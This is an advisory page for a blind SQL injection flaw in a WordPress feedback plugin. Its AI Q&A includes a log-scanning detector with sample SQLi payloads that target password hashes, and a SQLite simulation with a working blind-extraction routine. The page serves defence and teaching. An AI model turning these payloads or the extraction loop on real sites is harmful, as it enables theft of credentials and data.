CVE-2026-39475
Blind SQL Injection in Syed Balkhi User Feedback Plugin
Publication date: 2026-04-08
Last updated on: 2026-04-29
Assigner: Patchstack
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| syed_balkhi | user_feedback | up to and including 1.10.1 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The SQL Injection vulnerability in the User Feedback plugin allows unauthorized database interaction, which can lead to data theft or manipulation.
Such unauthorized access and potential data breaches can negatively impact compliance with data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information.
Failure to address this vulnerability could result in exposure of protected data, leading to regulatory non-compliance and possible legal or financial consequences.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability allows a malicious actor with at least editor or developer privileges to interact with the plugin's database via SQL Injection. Detection typically involves two checks: confirming whether an affected version of the plugin (1.10.1 or earlier) is installed, and monitoring for unusual database queries or request patterns related to the User Feedback plugin, such as the time-delay (SLEEP/BENCHMARK) or boolean-probe payloads that blind injection relies on.
Specific commands or detection methods for this CVE are not provided in the available resources, and the page does not name the injectable parameter or endpoint, so any request-level signature has to be generic.
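As an added example (not code from Patchstack, the plugin, or this page's resources), the following Python performs both checks offline against constructed input: it parses `wp plugin list --format=json` output (assumed to carry `name` and `version` fields) to flag an installed `userfeedback-lite` below the 1.11.0 fix named on this page, and it scans combined-format web server log lines for request fingerprints of blind SQL injection. The log lines, the `action=example` value and the `id` parameter are placeholders constructed for the example; the page does not identify the plugin's real injectable parameter.

```python
import json
import re
from urllib.parse import unquote_plus

PLUGIN_SLUG = "userfeedback-lite"   # slug named on this page
FIXED_VERSION = "1.11.0"            # fixed release named on this page


def version_tuple(v):
    """'1.10.1' -> (1, 10, 1) so versions compare numerically, not as strings
    ('1.9.0' > '1.10.1' lexically, which is the classic mistake)."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def vulnerable_plugin_version(wp_plugin_list_json):
    """Parse `wp plugin list --format=json` output (assumed field names:
    name, version) and return the installed version of the plugin if it is
    below FIXED_VERSION, else None."""
    for plugin in json.loads(wp_plugin_list_json):
        if plugin.get("name") == PLUGIN_SLUG and \
           version_tuple(plugin["version"]) < version_tuple(FIXED_VERSION):
            return plugin["version"]
    return None


# Request-level fingerprints of blind SQLi probing. Boolean- and time-based
# techniques leave these even though no data is echoed back in the response.
SQLI_INDICATORS = {
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "boolean_tautology": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "char_extraction": re.compile(r"\b(substr|substring|ascii|mid|ord)\s*\(", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

# Apache/Nginx "combined" log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return one record per request whose URL-decoded request line matches
    any SQLI_INDICATORS pattern. POST bodies are not in access logs, so this
    only sees GET parameters; pair it with the DB slow-query log for SLEEP()."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m.group("url"))
        indicators = [name for name, rx in SQLI_INDICATORS.items() if rx.search(decoded)]
        if indicators:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "path": decoded.split("?", 1)[0],
                         "indicators": indicators})
    return hits


# Constructed sample data. 203.0.113.0/24 is a documentation range; the
# action name and 'id' parameter are placeholders, not the plugin's real ones.
SAMPLE_PLUGIN_LIST = json.dumps([
    {"name": "akismet", "status": "active", "update": "none", "version": "5.3"},
    {"name": "userfeedback-lite", "status": "active", "update": "available", "version": "1.10.1"},
])

SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2026:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=example&id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2026:10:01:09 +0000] "GET /wp-admin/admin-ajax.php?action=example&id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2026:10:01:20 +0000] "GET /wp-admin/admin-ajax.php?action=example&id=1%20AND%20ASCII(SUBSTRING((SELECT%20user_pass%20FROM%20wp_users%20LIMIT%201),1,1))%3E64 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2026:10:02:00 +0000] "GET /?p=12 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    print("vulnerable version installed:", vulnerable_plugin_version(SAMPLE_PLUGIN_LIST))
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print(hit)
```

Because exploitation requires an authenticated editor-level account, a log hit is only half the picture: correlate the source IP and timestamp with the WordPress user session active at that time (an audit-log plugin or the database session tokens), since the access log alone does not say which account sent the request.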
Can you explain this vulnerability to me?
CVE-2026-39475 is an SQL Injection vulnerability found in the WordPress User Feedback Plugin (userfeedback-lite) versions up to and including 1.10.1.
This vulnerability allows a malicious actor with at least editor or developer privileges to perform Blind SQL Injection attacks: the injected query's results are never returned in the response, so the attacker infers data indirectly, typically from whether a request succeeds (boolean-based) or how long it takes (time-based), and can still extract or manipulate data in the plugin's database.
The issue arises from improper neutralization of special elements used in SQL commands, enabling attackers to inject malicious SQL code.
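As an added illustration (not code from the plugin or from Patchstack), the following Python simulates the mechanism against an in-memory SQLite database: a lookup that splices its parameter into the query text, the same lookup with parameter binding, and a boolean-based blind extraction routine that recovers a value from another table using nothing but the true/false answer of the lookup. The table and column names, the `user_pass` target and the lookup itself are constructed for the example; the plugin's actual vulnerable query, parameter and endpoint are not shown on this page.

```python
import sqlite3

# Constructed in-memory schema standing in for WordPress tables. This is a
# teaching model only: it is NOT the User Feedback plugin's schema, query or
# endpoint, which this page does not show.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_feedback (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO wp_feedback VALUES (?, ?)",
                     [(1, "Homepage survey"), (2, "Checkout survey")])
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', '$P$BexampleHash')")
    conn.commit()
    return conn


def feedback_exists_vulnerable(conn, feedback_id):
    """CWE-89 pattern: the request parameter is spliced into the SQL text, so
    SQL syntax inside it is executed. Only True/False reaches the caller,
    which is what makes the resulting injection 'blind'."""
    sql = f"SELECT id FROM wp_feedback WHERE id = {feedback_id}"
    return conn.execute(sql).fetchone() is not None


def feedback_exists_fixed(conn, feedback_id):
    """Hardened form: the value is bound as a parameter and can never become
    SQL syntax. The WordPress equivalent is $wpdb->prepare('... WHERE id = %d', $id)."""
    row = conn.execute("SELECT id FROM wp_feedback WHERE id = ?", (feedback_id,)).fetchone()
    return row is not None


def blind_extract(oracle, subquery, max_len=64):
    """Boolean-based blind extraction: recover the result of `subquery` one
    character at a time using only the yes/no answer of `oracle(payload)`.
    Each character costs about seven requests (binary search over printable
    ASCII). Returns '' if the oracle never answers True, i.e. the sink is
    not injectable."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop when the target string has no character at this position.
        if not oracle(f"1 AND length(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite: unicode()/substr(); MySQL would use ASCII()/SUBSTRING().
            if oracle(f"1 AND unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    conn = build_db()
    target = "SELECT user_pass FROM wp_users WHERE ID = 1"
    leaked = blind_extract(lambda p: feedback_exists_vulnerable(conn, p), target)
    print("vulnerable sink leaked:", leaked)
    safe = blind_extract(lambda p: feedback_exists_fixed(conn, p), target)
    print("parameterised sink leaked:", repr(safe))
```

The point of the example is the asymmetry: the attacker's payload never sees a row of output, yet roughly seven true/false answers per character are enough to walk the whole value out of an unrelated table. A time-based variant replaces the true/false answer with a delay (MySQL `SLEEP()`) for sinks where even the success of the request is not observable. Against the parameterised version the probes are compared as literal text and the extraction loop returns an empty string on the first step.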
How can this vulnerability impact me?
This vulnerability can allow attackers holding at least editor or developer privileges to interact directly with the plugin's database.
- Potential data theft from the database.
- Manipulation or corruption of stored data.
The vulnerability carries a CVSS score of 7.6, which is High severity under CVSS v3.x (7.0 to 8.9), but Patchstack rates it low priority because the attacker must already hold an editor-level or higher account, which limits both the impact and the likelihood of exploitation.
Authenticated SQL injection flaws in widely installed WordPress plugins are still worth patching promptly: a compromised or malicious editor account is a realistic foothold, and this flaw turns it into read and write access to the database.
What immediate steps should I take to mitigate this vulnerability?
The immediate recommended step is to update the WordPress User Feedback plugin (userfeedback-lite) to version 1.11.0 or later, where the issue has been patched, and to confirm the installed version afterwards, since sites with automatic updates disabled will not pick up the fix on their own.
Using automated update tools provided by Patchstack can help rapidly protect vulnerable plugins.
Until the update is applied, exposure is limited to accounts with at least editor or developer privileges, so reviewing who holds such accounts and removing stale ones reduces risk; only the update removes the injection itself and prevents the database compromise it enables.